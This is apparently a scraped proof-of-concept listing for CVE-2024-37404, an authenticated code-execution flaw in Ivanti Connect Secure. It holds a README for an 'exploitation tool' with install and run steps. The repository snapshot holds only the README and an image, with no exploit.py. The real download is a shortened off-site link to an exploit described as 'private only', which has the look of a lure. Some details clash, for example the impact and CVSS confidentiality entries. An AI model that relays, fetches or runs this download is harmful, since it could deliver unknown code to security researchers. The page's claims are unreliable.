CVE-2024-37404 PoC — Ivanti Connect Secure和Ivanti Policy Secure 安全漏洞

Source

Associated Vulnerability

Readme

## 🌟 Description
CVE-2024-37404 - Ivanti Connect Secure - Authenticated RCE via OpenSSL CRLF Injection
An attacker with administrative access to the web application, potentially gained through exploitation of previous vulnerabilities or credential compromise, could execute arbitrary code on the underlying system with root privileges.

## Details

- **CVE ID**: [CVE-2024-37404]
- **Discovered**: 2024-04-05
- **Published**: 2024-10-08
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/4XwoO)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-37404
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```


### Options

Options in README.txt

### Example

![image](https://github.com/nothe1senberg/CVE-2024-37404/blob/main/photo_2024-10-12_10-57-48.jpg)


## Affected versions
Ivanti Connect Secure versions prior to 22.7R2.1 and 22.7R2.2, and Ivanti Policy Secure versions prior to 22.7R1.1


## 📈 CVSS Information
Score: 9.1

Severity: CRITICAL

Confidentiality: None

Integrity: High

Availability: High

Attack Vector: Network

Attack Complexity: Low

File Snapshot

 [4.0K]  /data/pocs/ea19fd18ce6fdf5ba8d2450c8a5fb5a97e093809
├── [ 78K]  photo_2024-10-12_10-57-48.jpg
└── [1.4K]  README.md

0 directories, 2 files

Remarks